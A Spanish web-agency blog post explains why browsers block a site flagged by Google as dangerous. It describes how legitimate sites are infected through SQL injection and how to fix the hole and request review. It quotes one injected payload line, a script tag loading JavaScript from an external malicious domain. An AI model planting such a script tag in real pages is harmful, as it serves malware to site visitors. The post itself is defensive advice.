Servicio web a tu medida desde 1997.

Barcelona 933 516 148 – Madrid 911 232 109

Google bloquea el acceso a mi web

Google dice que mi web no es segura y bloquea el acceso a los usuarios:

Mensajes habituales que encuentras al intentar acceder a una web bloqueada:

Advertencia- Si visitas este sitio web, tu equipo puede resultar dañado.

¡Este sitio es una web atacante!

En primer lugar, no es google el que ha bloqueado tu web, tu navegador consulta la base de datos sobre webs infectadas con troyanos que mantiene Google y te bloquea el acceso a las webs infectadas.

Habitualmente este bloqueo se producia sobre las webs falsas que intentaban instalar troyanos en los usuarios pero ultimamente cada vez más webs legitimas son infectadas (normalmente por inyección SQL) y entran en el indice de webs peligrosas. Aprovechando vulnerabilidades en la programación y los sistemas de acceso a bases de datos los «hackers» consiguen cambiar los contenidos de la base de datos de la web atacada añadiendo un código (<script src=http://www.supbnr.com/b .js></script> u otros ) que hace que el usuario ejecute una aplicación maliciosa.

Para resolver el problema de acceso en primer lugar hay que aplicar las medidas de seguridad oportunas para que no vuelvan a infectar la web y en segundo lugar notificar a google que «estamos limpios». Simplemente limpiando la infección no es suficiente pues en muy breve plazo volverían a introducir el código malicioso dado que no se ha cerrado el agujero de seguridad.

Si Usted no sabe como solucionar el problema y su empresa de desarrollo no responde, contacte con nosotros y encontrará un servicio de mantenimiento que si responde.

Más información:

Inyección SQL
Miles de Webs caen víctimas de una nueva oleada de ataques

Marta Soler

Consultora de Presencia Online.

Encantada! Soy Marta y cuando quieras podemos vernos, online / offline, para ayudaros a encontrar opciones para vuestra presencia Online.

    He leído y acepto la Política de privacidad
    Responsable: INTERDIGITAL CORPORACIÓN TECNOLÓGICA, S.L. – Finalidad: Atender solicitudes de información. Contratación de productos y/o servicios e inscripción a eventos. Remitir comunicaciones comerciales y segmentación con fines comerciales – Derechos: Revocar el consentimiento. Acceso, rectificación, supresión, limitación u oposición a l tratamiento, derecho a no ser objeto de decisiones automatizadas, así como a obtener información clara y transparente sobre el tratamiento de los datos. – Se puede consultar la política de privacidad de forma más detallada aquí
    captcha

    ¿Quieres añadir a tu proyecto
    nuestros +25 años de experiencia?

    © Copyright 2024 INTERDIGITAL.es © | Aviso Legal | Política de cookies | Política de privacidad